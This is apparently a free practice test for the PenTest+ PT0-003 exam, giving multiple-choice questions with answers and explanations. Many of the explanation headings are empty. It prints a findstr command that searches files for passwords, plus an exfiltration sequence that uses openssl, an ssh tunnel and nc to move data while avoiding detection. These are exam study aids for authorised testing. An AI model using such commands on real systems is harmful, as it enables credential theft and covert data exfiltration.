PT0-003 Free Practice Test

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:
findstr /SIM /C:"pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?

1. A. Configuration files
2. B. Permissions
3. C. Virtual hosts
4. D. Secrets

Correct Answer: D
By running the command findstr /SIM /C:"pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
✑ Command Analysis:
✑ Objective:
✑ Other Options:
Pentest References:
✑ Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access.
✑ Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
=================

Which of the following components should a penetration tester include in an assessment report?

1. A. User activities
2. B. Customer remediation plan
3. C. Key management
4. D. Attack narrative

Correct Answer: D
An attack narrative provides a detailed account of the steps taken during the penetration test, including the methods used, vulnerabilities exploited, and the outcomes of each attack. This helps stakeholders understand the context and implications of the findings.
✑ Components of an Assessment Report:
✑ Importance of Attack Narrative:
✑ References from Pentesting Literature: Step-by-Step ExplanationReferences:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================

A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?

1. A. Sniffing
2. B. Banner grabbing
3. C. TCP/UDP scanning
4. D. Ping sweeps

Correct Answer: A
To gather information about the network without causing detection mechanisms to flag the reconnaissance activities, the penetration tester should use sniffing.
✑ Sniffing:
✑ Advantages:
✑ Comparison with Other Techniques:
Pentest References:
✑ Reconnaissance Phase: Using passive techniques like sniffing during the initial reconnaissance phase helps gather information without alerting the target.
✑ Network Analysis: Understanding the network topology and identifying key assets and vulnerabilities without generating traffic that could trigger alarms.
By using sniffing, the penetration tester can gather detailed information about the network in a stealthy manner, minimizing the risk of detection.
=================

During a penetration test, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard- coded credentials most effectively?

1. A. Run TruffleHog against a local clone of the application
2. B. Scan the live web application using Nikto
3. C. Perform a manual code review of the Git repository
4. D. Use SCA software to scan the application source code

Correct Answer: A
Given a short assessment timeline and the need to identify hard-coded credentials in a large codebase, using an automated tool designed for this specific purpose is the most effective approach. Here??s an explanation of each option:
✑ Run TruffleHog against a local clone of the application (Answer: A):
✑ Scan the live web application using Nikto (Option B):
✑ Perform a manual code review of the Git repository (Option C):
✑ Use SCA software to scan the application source code (Option D):
Conclusion: Running TruffleHog against a local clone of the application is the most effective approach for quickly identifying hard-coded credentials in a large codebase within a limited timeframe.

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

1. A. Apply UTF-8 to the data and send over a tunnel to TCP port 25.
2. B. Apply Base64 to the data and send over a tunnel to TCP port 80.
3. C. Apply 3DES to the data and send over a tunnel UDP port 53.
4. D. Apply AES-256 to the data and send over a tunnel to TCP port 443.

Correct Answer: D
AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.
✑ Encrypting Data with AES-256:
Step-by-Step Explanationopenssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin
-k secretkey
✑ Setting Up a Secure Tunnel:
ssh -L 443:targetserver:443 user@intermediatehost
✑ Transferring Data Over the Tunnel: cat encrypted.bin | nc targetserver 443
✑ Benefits of Using AES-256 and Port 443:
✑ Real-World Example:
✑ References from Pentesting Literature: References:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================